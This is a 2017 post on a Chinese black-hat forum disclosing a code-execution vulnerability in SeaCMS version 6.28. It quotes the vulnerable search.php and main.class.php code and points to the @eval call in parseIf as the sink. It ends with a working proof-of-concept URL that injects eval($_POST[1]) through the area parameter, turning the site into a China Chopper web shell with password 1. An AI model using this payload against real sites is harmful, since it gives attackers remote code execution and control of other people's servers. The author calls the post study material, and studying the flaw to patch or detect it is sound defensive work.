黑帽联盟

标题: 海洋CMS V6.28代码执行0day [打印本页]
作者: 定位    时间: 2017-4-14 04:41
标题: 海洋CMS V6.28代码执行0day
海洋CMS 版本 6.28 代码执行漏洞,很早之前挖的,网上已经被曝了,发出来当学习吧

漏洞文件:seacms/search.php
  1. function echoSearchPage()
  2. {
  3.     global $dsql,$cfg_iscache,$mainClassObj,$page,$t1,$cfg_search_time,$searchtype,$searchword,$tid,$year,$letter,$area,$yuyan,$state,$ver,$order,$jq,$money,$cfg_basehost;
  4.     $order = !empty($order)?$order:time;
  5.     if(intval($searchtype)==5)
  6.     {
  7.         $searchTemplatePath = "/templets/".$GLOBALS['cfg_df_style']."/".$GLOBALS['cfg_df_html']."/cascade.html";
  8.         $typeStr = !empty($tid)?intval($tid).'_':'0_';
  9.         $yearStr = !empty($year)?PinYin($year).'_':'0_';
  10.         $letterStr = !empty($letter)?$letter.'_':'0_';
  11.         $areaStr = !empty($area)?PinYin($area).'_':'0_';
  12.         $orderStr = !empty($order)?$order.'_':'0_';
  13.         $jqStr = !empty($jq)?$jq.'_':'0_';
  14.         $cacheName="parse_cascade_".$typeStr.$yearStr.$letterStr.$areaStr.$orderStr;
  15.         $pSize = getPageSizeOnCache($searchTemplatePath,"cascade","");
  16.     }else
  17.     {
  18.         if($cfg_search_time&&$page==1) checkSearchTimes($cfg_search_time);
  19.         $searchTemplatePath = "/templets/".$GLOBALS['cfg_df_style']."/".$GLOBALS['cfg_df_html']."/search.html";
  20.         $cacheName="parse_search_";
  21.         $pSize = getPageSizeOnCache($searchTemplatePath,"search","");
  22.     }
  23.     if (empty($pSize)) $pSize=12;
  24.     switch (intval($searchtype)) {
  25.         case -1:
  26.             $whereStr=" where v_recycled=0 and (v_name like '%$searchword%' or v_actor like '%$searchword%' or v_director like '%$searchword%' or v_publisharea like '%$searchword%'  or v_publishyear like '%$searchword%' or v_letter='$searchword' or v_tags='$searchword' or v_nickname like '%$searchword%')";
  27.         break;
  28.         case 0:
  29.             $whereStr=" where v_recycled=0 and v_name like '%$searchword%'";   
  30.         break;
  31.         case 1:
  32.             $whereStr=" where v_recycled=0 and v_actor like '%$searchword%'";
  33.         break;
  34.         case 2:
  35.             $whereStr=" where v_recycled=0 and v_publisharea like '%$searchword%'";
  36.         break;
  37.         case 3:
  38.             $whereStr=" where v_recycled=0 and v_publishyear like '%$searchword%'";
  39.         break;
  40.         case 4:
  41.             $whereStr=" where v_recycled=0 and v_letter='".strtoupper($searchword)."'";
  42.         break;
  43.         case 5:
  44.             $whereStr=" where v_recycled=0";
  45.             if(!empty($tid)) $whereStr.=" and (tid in (".getTypeId($tid).") or FIND_IN_SET('".$tid."',v_extratype)<>0)";
  46.             if($year=="more")
  47.                 {
  48.                 $publishyeartxt=sea_DATA."/admin/publishyear.txt";
  49.                         $publishyear = array();
  50.                         if(filesize($publishyeartxt)>0)
  51.                         {
  52.                             $publishyear = file($publishyeartxt);
  53.                         }
  54.                         $yearArray=$publishyear;
  55.                         $yeartxt= implode(',',$yearArray);
  56.                         $whereStr.=" and v_publishyear not in ($yeartxt)";
  57.                 }
  58.             if(!empty($year) AND $year!="more")
  59.                 {$whereStr.=" and v_publishyear='$year'";}
  60.             if($letter=="0-9")
  61.                 {$whereStr.=" and v_letter in ('0','1','2','3','4','5','6','7','8','9')";}
  62.             if(!empty($letter) AND $letter!="0-9")
  63.                 {$whereStr.=" and v_letter='$letter'";}
  64.             if(!empty($area)) $whereStr.=" and v_publisharea='$area'";
  65.             if(!empty($yuyan)) $whereStr.=" and v_lang='$yuyan'";
  66.             if(!empty($jq)) $whereStr.=" and v_jq like'%$jq%'";
  67.             if($state=='l') $whereStr.=" and v_state !=0";
  68.             if($state=='w') $whereStr.=" and v_state=0";
  69.             if($money=='s') $whereStr.=" and v_money !=0";
  70.             if($money=='m') $whereStr.=" and v_money=0";
  71.             if(!empty($ver)) $whereStr.=" and v_ver='$ver'";
  72.         break;
  73.     }
  74.     $sql="select count(*) as dd from sea_data ".$whereStr;
  75.     $row = $dsql->GetOne($sql);
  76.     if(is_array($row))
  77.     {
  78.         $TotalResult = $row['dd'];
  79.     }
  80.     else
  81.     {
  82.         $TotalResult = 0;
  83.     }
  84.     $pCount = ceil($TotalResult/$pSize);
  85.     if($cfg_iscache){
  86.         if(chkFileCache($cacheName)){
  87.             $content = getFileCache($cacheName);
  88.         }else{
  89.             $content = parseSearchPart($searchTemplatePath);
  90.             setFileCache($cacheName,$content);
  91.         }
  92.     }else{
  93.             $content = parseSearchPart($searchTemplatePath);
  94.     }
  95.     $content = str_replace("{searchpage:page}",$page,$content);
  96.     $content = str_replace("{seacms:searchword}",$searchword,$content);
  97.     $content = str_replace("{seacms:searchnum}",$TotalResult,$content);
  98.     $content = str_replace("{searchpage:ordername}",$order,$content);
  99.    
  100.     $content = str_replace("{searchpage:order-hit-link}",$cfg_basehost."/search.php?page=".$page."&searchtype=5&order=hit&tid=".$tid."&area=".$area."&year=".$year."&letter=".$letter."&yuyan=".$yuyan."&state=".$state."&money=".$money."&ver=".$ver."&jq=".$jq,$content);
  101.     $content = str_replace("{searchpage:order-hitasc-link}",$cfg_basehost."/search.php?page=".$page."&searchtype=5&order=hitasc&tid=".$tid."&area=".$area."&year=".$year."&letter=".$letter."&yuyan=".$yuyan."&state=".$state."&money=".$money."&ver=".$ver."&jq=".$jq,$content);
  102.    
  103.     $content = str_replace("{searchpage:order-id-link}",$cfg_basehost."/search.php?page=".$page."&searchtype=5&order=id&tid=".$tid."&area=".$area."&year=".$year."&letter=".$letter."&yuyan=".$yuyan."&state=".$state."&money=".$money."&ver=".$ver."&jq=".$jq,$content);
  104.     $content = str_replace("{searchpage:order-idasc-link}",$cfg_basehost."/search.php?page=".$page."&searchtype=5&order=idasc&tid=".$tid."&area=".$area."&year=".$year."&letter=".$letter."&yuyan=".$yuyan."&state=".$state."&money=".$money."&ver=".$ver."&jq=".$jq,$content);
  105.    
  106.     $content = str_replace("{searchpage:order-time-link}",$cfg_basehost."/search.php?page=".$page."&searchtype=5&order=time&tid=".$tid."&area=".$area."&year=".$year."&letter=".$letter."&yuyan=".$yuyan."&state=".$state."&money=".$money."&ver=".$ver."&jq=".$jq,$content);
  107.     $content = str_replace("{searchpage:order-timeasc-link}",$cfg_basehost."/search.php?page=".$page."&searchtype=5&order=timeasc&tid=".$tid."&area=".$area."&year=".$year."&letter=".$letter."&yuyan=".$yuyan."&state=".$state."&money=".$money."&ver=".$ver."&jq=".$jq,$content);
  108.    
  109.     $content = str_replace("{searchpage:order-commend-link}",$cfg_basehost."/search.php?page=".$page."&searchtype=5&order=commend&tid=".$tid."&area=".$area."&year=".$year."&letter=".$letter."&yuyan=".$yuyan."&state=".$state."&money=".$money."&ver=".$ver."&jq=".$jq,$content);
  110.     $content = str_replace("{searchpage:order-commendasc-link}",$cfg_basehost."/search.php?page=".$page."&searchtype=5&order=commendasc&tid=".$tid."&area=".$area."&year=".$year."&letter=".$letter."&yuyan=".$yuyan."&state=".$state."&money=".$money."&ver=".$ver."&jq=".$jq,$content);
  111.    
  112.     $content = str_replace("{searchpage:order-score-link}",$cfg_basehost."/search.php?page=".$page."&searchtype=5&order=score&tid=".$tid."&area=".$area."&year=".$year."&letter=".$letter."&yuyan=".$yuyan."&state=".$state."&money=".$money."&ver=".$ver."&jq=".$jq,$content);
  113.     $content = str_replace("{searchpage:order-scoreasc-link}",$cfg_basehost."/search.php?page=".$page."&searchtype=5&order=scoreasc&tid=".$tid."&area=".$area."&year=".$year."&letter=".$letter."&yuyan=".$yuyan."&state=".$state."&money=".$money."&ver=".$ver."&jq=".$jq,$content);
  114.     if(intval($searchtype)==5)
  115.     {
  116.         $tname = !empty($tid)?getTypeNameOnCache($tid):'全部';
  117.         $jq = !empty($jq)?$jq:'全部';
  118.         $area = !empty($area)?$area:'全部';
  119.         $year = !empty($year)?$year:'全部';
  120.         $yuyan = !empty($yuyan)?$yuyan:'全部';
  121.         $letter = !empty($letter)?$letter:'全部';
  122.         $state = !empty($state)?$state:'全部';
  123.         $ver = !empty($ver)?$ver:'全部';
  124.         $money = !empty($money)?$money:'全部';
  125.         $content = str_replace("{searchpage:type}",$tid,$content);
  126.         $content = str_replace("{searchpage:typename}",$tname ,$content);
  127.         $content = str_replace("{searchpage:year}",$year,$content);
  128.         $content = str_replace("{searchpage:area}",$area,$content);
  129.         $content = str_replace("{searchpage:letter}",$letter,$content);
  130.         $content = str_replace("{searchpage:lang}",$yuyan,$content);
  131.         $content = str_replace("{searchpage:jq}",$jq,$content);
  132.         if($state=='w'){$state2="完结";}elseif($state=='l'){$state2="连载中";}else{$state2="全部";}
  133.         if($money=='m'){$money2="免费";}elseif($money=='s'){$money2="收费";}else{$money2="全部";}
  134.         $content = str_replace("{searchpage:state}",$state2,$content);
  135.         $content = str_replace("{searchpage:money}",$money2,$content);
  136.         $content = str_replace("{searchpage:ver}",$ver,$content);
  137.         $content=$mainClassObj->parsePageList($content,"",$page,$pCount,$TotalResult,"cascade");
  138.         $content=$mainClassObj->parseSearchItemList($content,"type");
  139.         $content=$mainClassObj->parseSearchItemList($content,"year");
  140.         $content=$mainClassObj->parseSearchItemList($content,"area");
  141.         $content=$mainClassObj->parseSearchItemList($content,"letter");
  142.         $content=$mainClassObj->parseSearchItemList($content,"lang");
  143.         $content=$mainClassObj->parseSearchItemList($content,"jq");
  144.         $content=$mainClassObj->parseSearchItemList($content,"state");
  145.         $content=$mainClassObj->parseSearchItemList($content,"ver");
  146.         $content=$mainClassObj->parseSearchItemList($content,"money");
  147.     }else
  148.     {
  149.         $content=$mainClassObj->parsePageList($content,"",$page,$pCount,$TotalResult,"search");
  150.     }
  151.     $content=replaceCurrentTypeId($content,-444);
  152.     $content=$mainClassObj->parseIf($content);  //这个函数引起的,我们来跟踪下这个函数
  153.     $content=str_replace("{seacms:member}",front_member(),$content);
  154.     $searchPageStr = $content;
  155.     echo str_replace("{seacms:runinfo}",getRunTime($t1),$searchPageStr) ;
  156. }
复制代码
parseif函数路径:/include/main.class.php
  1. function parseIf($content){
  2.         if (strpos($content,'{if:')=== false){
  3.         return $content;
  4.         }else{
  5.         $labelRule = buildregx("{if:(.*?)}(.*?){end if}","is");
  6.         $labelRule2="{elseif";
  7.         $labelRule3="{else}";
  8.         preg_match_all($labelRule,$content,$iar);
  9.         $arlen=count($iar[0]);
  10.         $elseIfFlag=false;
  11.         for($m=0;$m<$arlen;$m++){
  12.             $strIf=$iar[1][$m];
  13.             $strIf=$this->parseStrIf($strIf);
  14.             $strThen=$iar[2][$m];
  15.             $strThen=$this->parseSubIf($strThen);
  16.             if (strpos($strThen,$labelRule2)===false){
  17.                 if (strpos($strThen,$labelRule3)>=0){
  18.                     $elsearray=explode($labelRule3,$strThen);
  19.                     $strThen1=$elsearray[0];
  20.                     $strElse1=$elsearray[1];
  21.                     @eval("if(".$strIf."){\$ifFlag=true;}else{\$ifFlag=false;}");
  22.                     if ($ifFlag){ $content=str_replace($iar[0][$m],$strThen1,$content);} else {$content=str_replace($iar[0][$m],$strElse1,$content);}
  23.                 }else{
  24.                     @eval("if(".$strIf.") { \$ifFlag=true;} else{ \$ifFlag=false;}");//就是这里了,@eval
  25.                 if ($ifFlag) $content=str_replace($iar[0][$m],$strThen,$content); else $content=str_replace($iar[0][$m],"",$content);}
  26.             }else{
  27.                 $elseIfArray=explode($labelRule2,$strThen);
  28.                 $elseIfArrayLen=count($elseIfArray);
  29.                 $elseIfSubArray=explode($labelRule3,$elseIfArray[$elseIfArrayLen-1]);
  30.                 $resultStr=$elseIfSubArray[1];
  31.                 $elseIfArraystr0=addslashes($elseIfArray[0]);
  32.                 @eval("if($strIf){\$resultStr=\"$elseIfArraystr0\";}");
  33.                 for($elseIfLen=1;$elseIfLen<$elseIfArrayLen;$elseIfLen++){
  34.                     $strElseIf=getSubStrByFromAndEnd($elseIfArray[$elseIfLen],":","}","");
  35.                     $strElseIf=$this->parseStrIf($strElseIf);
  36.                     $strElseIfThen=addslashes(getSubStrByFromAndEnd($elseIfArray[$elseIfLen],"}","","start"));
  37.                     @eval("if(".$strElseIf."){\$resultStr=\"$strElseIfThen\";}");
  38.                     @eval("if(".$strElseIf."){\$elseIfFlag=true;}else{\$elseIfFlag=false;}");
  39.                     if ($elseIfFlag) {break;}
  40.                 }
  41.                 $strElseIf0=getSubStrByFromAndEnd($elseIfSubArray[0],":","}","");
  42.                 $strElseIfThen0=addslashes(getSubStrByFromAndEnd($elseIfSubArray[0],"}","","start"));
  43.                 if(strpos($strElseIf0,'==')===false&&strpos($strElseIf0,'=')>0)$strElseIf0=str_replace('=', '==', $strElseIf0);
  44.                 @eval("if(".$strElseIf0."){\$resultStr=\"$strElseIfThen0\";\$elseIfFlag=true;}");
  45.                 $content=str_replace($iar[0][$m],$resultStr,$content);
  46.             }
  47.         }
  48.         return $content;
  49.         }
复制代码
POC:/search.php?searchtype=5&tid=&area=eval($_POST[1]) 菜刀链接,密码为1




欢迎光临 黑帽联盟 (https://bbs.cnblackhat.com/) Powered by Discuz! X2.5